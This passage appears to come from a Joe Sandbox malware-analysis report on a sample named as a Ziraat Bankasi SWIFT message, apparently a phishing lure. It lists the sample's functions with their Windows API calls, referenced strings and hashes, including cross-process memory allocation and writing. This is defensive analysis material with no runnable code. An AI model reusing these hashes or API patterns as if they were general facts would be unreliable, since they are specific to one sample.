Instruction ID: c0053b7f9a2c8477d2d6148156089d7f4c14d61d9fe0b0e3c1bc593c1b96b39a
Opcode Fuzzy Hash: 063df07d83f95391e42314824a11b114bf6e5aeac5079aa33efe2e9f72259197
Instruction Fuzzy Hash: 91215971600218ABCF10EFA4C882EFE77B5AF45740F004469F515EB582DB71EA45DBA1

Function 0010955E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000E7DB1: GetLocalTime.KERNEL32 ref: 000E7DBE
Part of subcall function 000E7DB1: _wcsncpy.LIBCMT ref: 000E7DF3
Part of subcall function 000E7DB1: _wcsncpy.LIBCMT ref: 000E7E25
Part of subcall function 000E7DB1: _wcsncpy.LIBCMT ref: 000E7E58
Part of subcall function 000E7DB1: _wcsncpy.LIBCMT ref: 000E7E9A

SendMessageW.USER32(?,00001002,00000000,?), ref: 001095F8

Strings

SysDateTimePick32, xrefs: 001095B6
@U=u, xrefs: 001095F8

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcsncpy$LocalMessageSendTime
String ID: @U=u$SysDateTimePick32
API String ID: 2466184910-2530228043
Opcode ID: 3872b03d4fb4160e600d762e725e86cd26983ca8ddd6dbac53c22c12656a0a4e
Instruction ID: 593c7e3ef11e837b0dfd9de70b4b8a3a1f997f16136644be6121eb2f8ca56e00
Opcode Fuzzy Hash: 3872b03d4fb4160e600d762e725e86cd26983ca8ddd6dbac53c22c12656a0a4e
Instruction Fuzzy Hash: 4C21E4712402046FEF229E54DC92FEE3369EB44750F100916F991AB1D1D7F1EC8187A0

Function 000DBB97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000DBBB0

Part of subcall function 000E422F: GetWindowThreadProcessId.USER32(?,?), ref: 000E425A
Part of subcall function 000E422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,000DBBCC,00000034,?,?,00001004,00000000,00000000), ref: 000E426A
Part of subcall function 000E422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,000DBBCC,00000034,?,?,00001004,00000000,00000000), ref: 000E4280

Part of subcall function 000E430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000DBC08,?,?,00000034,00000800,?,00000034), ref: 000E4335

SendMessageW.USER32(?,00001073,00000000,?), ref: 000DBC17

Part of subcall function 000E42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000DBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 000E4300

Strings

@U=u, xrefs: 000DBBB0, 000DBC17

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
String ID: @U=u
API String ID: 1045663743-2594219639
Opcode ID: fcc3a6a7a6e2df739dc589d95b243e5ec7ee21867e2f70f0b7035dee47b3ae2e
Instruction ID: f82d9410942963a8d15f0cd7e808851f5c9e041a68646f8fa9eac66c0c4aa78c
Opcode Fuzzy Hash: fcc3a6a7a6e2df739dc589d95b243e5ec7ee21867e2f70f0b7035dee47b3ae2e
Instruction Fuzzy Hash: 4C215E31901218EBEF21ABA8DC41FDEBBB4FF05350F1001A5F644A7191EE705A55DBA0

Function 001093CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0010945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00109467

Strings

Combobox, xrefs: 00109429

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 52f3142554c8b0b78c4552d5fa8dead9d3aad2b8337f2f283f18942c7d196f21
Instruction ID: 71c1e60cd3e19b1f49fb7b250c80b6a1279fcd40c78b2375ee28fe446f10d481
Opcode Fuzzy Hash: 52f3142554c8b0b78c4552d5fa8dead9d3aad2b8337f2f283f18942c7d196f21
Instruction Fuzzy Hash: 031193B1300108BFEF259E64DC90EAB376AEB483A4F110125F955DB2D1D7B19C528760

Function 0010C3DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

@U=u, xrefs: 0010C45F, 0010C488

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID: @U=u
API String ID: 0-2594219639
Opcode ID: a6f641c5bb0592f8304725e5576de425c0eeb657326df12c5c6d0e7fe9ec2fed
Instruction ID: 514789a33c71887aa38331600b409072c58ba1a139efafe4701a1af6c7471d7a
Opcode Fuzzy Hash: a6f641c5bb0592f8304725e5576de425c0eeb657326df12c5c6d0e7fe9ec2fed
Instruction Fuzzy Hash: 06117C75104218BAEF258FA4CC25FBA37A4FB09710F148215FA96EA4D0D7F09A54EFA1

Function 000DD4F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000A103B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 000A1052

SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 000DD54E
_strlen.LIBCMT ref: 000DD559

Strings

@U=u, xrefs: 000DD54E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$Timeout_strlen
String ID: @U=u
API String ID: 2777139624-2594219639
Opcode ID: 02c3f66453eebc3dd895d4b5877109568ca45821b86d1122db85d2b1ab05aa37
Instruction ID: 24a75b0079590279183ec45365da81adbe4f7a43437f6139e11cc9919b5e1b53
Opcode Fuzzy Hash: 02c3f66453eebc3dd895d4b5877109568ca45821b86d1122db85d2b1ab05aa37
Instruction Fuzzy Hash: BB117731200205A7DB14BFA8EC96DFE7BB89F56344F00443BF5069B297DE61D9469B70

Function 001098FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 000BD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000BD1BA
Part of subcall function 000BD17C: GetStockObject.GDI32(00000011), ref: 000BD1CE
Part of subcall function 000BD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 000BD1D8

GetWindowRect.USER32(00000000,?), ref: 00109968
GetSysColor.USER32(00000012), ref: 00109982

Strings

static, xrefs: 00109945

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 60b9da06bc705e9673711a879a92ccccda1db4e7eaf3bc5641dcbd54fd8b6847
Instruction ID: 14e015609848070f0eced6d6d1ef1098e19d0bd661cfbcd4db8ab7ce78693eca
Opcode Fuzzy Hash: 60b9da06bc705e9673711a879a92ccccda1db4e7eaf3bc5641dcbd54fd8b6847
Instruction Fuzzy Hash: 5D116A7251020ABFDB14DFB8CC45AEA7BB8FB08304F010618F995D3291E774E851DB50

Function 000E5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000E52D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 000E52F4

Strings

0, xrefs: 000E52CE

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 5171454d984a9c75f6e36028ecc07e871102acbba62a0c041c882ca9b0b7b8ea
Instruction ID: 8cb3e0b6bd65a3a9563889e83e607818522eb84a47d85b493d97f4d49b194dd0
Opcode Fuzzy Hash: 5171454d984a9c75f6e36028ecc07e871102acbba62a0c041c882ca9b0b7b8ea
Instruction Fuzzy Hash: D711E276901654AFDBA0DBAADD04B9D77F8AB06759F180429E902F72D0D3B0EE04DB90

Function 000F4D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 000F4DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 000F4E1E

Strings

<local>, xrefs: 000F4DE6

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 10bfe66782f03d175097c582a75455a308a23bb9f08f22adb60e762fb1be70ca
Instruction ID: 2e320d9497632e4ff9bc68c541568a69044132600ecdc53a620b135c6ff5acc1
Opcode Fuzzy Hash: 10bfe66782f03d175097c582a75455a308a23bb9f08f22adb60e762fb1be70ca
Instruction Fuzzy Hash: 8511A070501229FBDB358F51C888EFBFAACFF06765F10822AFA1556940D3B05995E6E0

Function 0010B1DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 0010B22B

Strings

@U=u, xrefs: 0010B22B, 0010B267

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: eccf42ef4eac09f4fbe4a3a86d8cf13a01afc858cb38c20d4c696bb88cfd5d81
Instruction ID: cc76fe8e2ab4760e1668d645a615d465ae1922709822b6bc7c9ab650039029a2
Opcode Fuzzy Hash: eccf42ef4eac09f4fbe4a3a86d8cf13a01afc858cb38c20d4c696bb88cfd5d81
Instruction Fuzzy Hash: E221D37961420AEFCF19CF98D8808EE7BB6FB4D340B114154FD46A7360D771A961DBA0

Function 001092B1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000401,?,00000000), ref: 00109327

Strings

button, xrefs: 001092FE
@U=u, xrefs: 00109327

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: @U=u$button
API String ID: 3850602802-1762282863
Opcode ID: 0c2efce5a9f89c0a804790dd2271c6c18fb8c6f2c190829c31259ef7a5c414bc
Instruction ID: 56a3393c4915695bca10d7be796c62c6e8f2b5efff47ad554561328803d6b2a2
Opcode Fuzzy Hash: 0c2efce5a9f89c0a804790dd2271c6c18fb8c6f2c190829c31259ef7a5c414bc
Instruction Fuzzy Hash: 4A11ED72150209BBDF118F74CC11FEA376AFF08314F150614FAA5AB1E1D7B2E8A1AB20

Function 0010A587 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000133E,00000000,?), ref: 0010A5D3

Strings

@U=u, xrefs: 0010A5D3

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: d687a1d0477348d6b6e8d05f5780c38247b849d4b0655480d9fe82884387968f
Instruction ID: 7cd62312731e102e164746deec939d5a400257a78ed2330563ed039b0a243a9a
Opcode Fuzzy Hash: d687a1d0477348d6b6e8d05f5780c38247b849d4b0655480d9fe82884387968f
Instruction Fuzzy Hash: A211AC71500744AFDB20CF24C891AE6BBF9BF05314F54890DE9EA972D1D7B169429B60

Function 000FA82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 000FA84E
htons.WSOCK32(00000000,?,00000000), ref: 000FA88B

Strings

255.255.255.255, xrefs: 000FA866

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 4f9b871a0c7e3b04b5445cb12cea7f7ff76b21c0e2fc7888a5fba0e7839315d6
Instruction ID: 7499ab4fd0f4f96b7a95445b147d6314f5902c216e4f29d683d5af90c8eac3a3
Opcode Fuzzy Hash: 4f9b871a0c7e3b04b5445cb12cea7f7ff76b21c0e2fc7888a5fba0e7839315d6
Instruction Fuzzy Hash: 70010875300308ABC7219F64C845FBDB364EF05754F104426E6159B691CB71D802D751

Function 0010F2D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB34E: GetWindowLongW.USER32(?,000000EB), ref: 000BB35F

DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0011E44F,?,?,?), ref: 0010F344

Part of subcall function 000BB526: GetWindowLongW.USER32(?,000000EB), ref: 000BB537

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0010F32A

Strings

@U=u, xrefs: 0010F32A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: @U=u
API String ID: 982171247-2594219639
Opcode ID: a3436b225e12a359ba1ca85d9a55b1a51941ff2e24c9ae55a4c00d1ed640a97c
Instruction ID: aa4e9458afcf12dc5c651d6319953e9e3124fd3be5fa6450f60b3bb90bcdb7a4
Opcode Fuzzy Hash: a3436b225e12a359ba1ca85d9a55b1a51941ff2e24c9ae55a4c00d1ed640a97c
Instruction Fuzzy Hash: AD019E35201204ABCB359F14EC45FAA7B66FB85324F184528F8451B6E1C7B1A853DB50

Function 000A4024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

LoadImageW.USER32(000A0000,00000063,00000001,00000010,00000010,00000000), ref: 000A4048
EnumResourceNamesW.KERNEL32(00000000,0000000E,000E67E9,00000063,00000000,753E0280,?,?,000A3EE1,?,?,000000FF), ref: 001141B3

Strings

>, xrefs: 000A4028

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: EnumImageLoadNamesResource
String ID: >
API String ID: 1578290342-1159816959
Opcode ID: d56a5c4a8de7ab913d521bea18a66e5e484f83ffe7fa4053c6d6d9210088bc5b
Instruction ID: 4efd9b2d8a5bcd7bce05c311deb4b34b6eb3f56a1b5bbbe84007c7fbf710ee66
Opcode Fuzzy Hash: d56a5c4a8de7ab913d521bea18a66e5e484f83ffe7fa4053c6d6d9210088bc5b
Instruction Fuzzy Hash: A4F09A31740311BBEA304F2AFC4AFD23AA9E756BB5F14010AF714EA5E0D3F194C19AA0

Function 000DC65B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000DC66D
SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 000DC69D

Strings

@U=u, xrefs: 000DC66D, 000DC69D

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 031146940af79dab0263de0dda0d6ee2833cbcb3440cc42a4be6cb920cf38ef7
Instruction ID: b9c6dc00ff8fa80c074d1d9483479a5ab288e4273aa9cb14a7ca3a79fa961e21
Opcode Fuzzy Hash: 031146940af79dab0263de0dda0d6ee2833cbcb3440cc42a4be6cb920cf38ef7
Instruction Fuzzy Hash: FEF02071240308BBFB252E90EC82FEA3B28EB04791F204015F3051A1D1DAE29C619770

Function 000DC7D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000DC2DE: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 000DC2F7
Part of subcall function 000DC2DE: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 000DC331

SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 000DC7FC
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 000DC80C

Strings

@U=u, xrefs: 000DC7FC, 000DC80C

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 90524e9eccb85f59b8b273505e073977922f8e8d6d4170e599c47dd0d35bf342
Instruction ID: 1109de2feed686a4fe5ededd377ca9eb7f510d8f728e6d793d0f9ea4f6ed42ec
Opcode Fuzzy Hash: 90524e9eccb85f59b8b273505e073977922f8e8d6d4170e599c47dd0d35bf342
Instruction Fuzzy Hash: D7E0D87524430A7FF7261A61EC4AEA73B6CEB58761F11403AF70055191EEA38C62A530

Function 000E7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 000E7762
_wcscmp.LIBCMT ref: 000E7774

Strings

#32770, xrefs: 000E776E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: f4b57a09bf0e41085040660832d201f7476855da62fa1c5e9df4341870a8b62c
Instruction ID: 56071acbd15a5278cc84626617b0284eca206453e93f6d803ba88e2f696f41c0
Opcode Fuzzy Hash: f4b57a09bf0e41085040660832d201f7476855da62fa1c5e9df4341870a8b62c
Instruction Fuzzy Hash: 27E092776042246BD720AAA5EC0AECBFBACAB51760F00001AF915E3142D664A74587D0

Function 000DA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 000DA63F

Part of subcall function 000C13F1: _doexit.LIBCMT ref: 000C13FB

Strings

